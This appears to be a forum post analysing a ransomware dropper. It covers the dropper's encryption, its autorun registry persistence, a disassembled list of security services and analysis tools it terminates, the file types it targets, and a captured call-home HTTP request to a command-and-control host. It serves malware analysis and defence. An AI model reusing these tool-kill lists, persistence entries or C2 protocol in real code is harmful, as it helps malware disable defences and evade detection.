Used CryptoAPI, WOW64 compatible (can handle FS redirection), seems client-server rsa key decryption scheme.
Aware of certain applications process names and attempt to terminate them in usual way.
Autoruns through usual entries: Software\Microsoft\Windows\CurrentVersion\Run, Software\Microsoft\Windows NT\CurrentVersion\Winlogon (UserInit value) and autorun Start menu folder
Code: Select all.data:0041B434 ; "wscsvc"
.data:0041B438 dd offset aWindefend ; "WinDefend"
.data:0041B43C dd offset aWuauserv ; "wuauserv"
.data:0041B440 dd offset aMpssvc ; "MpsSvc"
.data:0041B448 ; "taskmgr"
.data:0041B44C dd offset aFilemon ; "filemon"
.data:0041B450 dd offset aTcpview ; "tcpview"
.data:0041B454 dd offset aFilemon_0 ; "filemon"
.data:0041B458 dd offset aProcexp ; "procexp"
.data:0041B45C dd offset aProcmon ; "procmon"
.data:0041B460 dd offset aRegmon ; "regmon"
.data:0041B464 dd offset aWireshark ; "wireshark"
.data:0041B468 dd offset aLordpe ; "LordPE"
.data:0041B46C dd offset aRegedit ; "regedit"
Targets following file extensions:
Code: Select all.jpg
.jpeg
.png
.doc
.rtf
.zip
.7z
.pdf
.docx
.docm
.xls
.xlsx
.xlsm
.rar
.avi
.mpeg
.mpg
.wmv
Example of "call home":
Code: Select allPOST / HTTP/1.1
Host: viweabkkfe.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)
Content-Type: multipart/form-data; boundary=AIXvIEELixblffGFsogn
Content-Length: 261
Accept-Language: en-us
Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\*;q=0.1
Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1
Pragma: no-cache
Connection: close
--removed
Content-Disposition: form-data; name="cmd"
ld
--removed
Content-Disposition: form-data; name="botid"
removed
--removed
Content-Disposition: form-data; name="lid"
0
--removed--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 24 Jul 2013 GMT
Content-Type: application/octet-stream
Content-Length: 191
Connection: close
X-Powered-By: PHP/5.3.25
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 24 Jul 2013 GMT
Cache-Control: max-age=0
Pragma: no-cache
f~Б*;F
ж–КУњЂвѕjjЙ(tТ=Ґ»*А¤‹3Emпq‚tKЙ^CЯcїє”ФґФQ:jћ-‚ќоNА^ѓ\щЋ™u¦љєboиoЯџСМЦ•wз:`”џVПiЫ№Р%Є‚є?©‘я¤€•ҐХ9Ы 0©RчЫ:“”•Њ
T’6У\h¬ЛЎ1i%нѕ3Ц1ЯП'#W4gn0vxвЈСЃ FґтшГxL;ъ“ЧH‚
In attach:
1) original dropper
2) decrypted dropper (note additional tiny trojan downloader in the overlay)
3) extracted additional resources including ransomware pictures and second trojan - notificator
Always use backups.
VT
original
https://www.virustotal.com/en/file/e908 ... /analysis/
deobfuscated
https://www.virustotal.com/en/file/9c67 ... /analysis/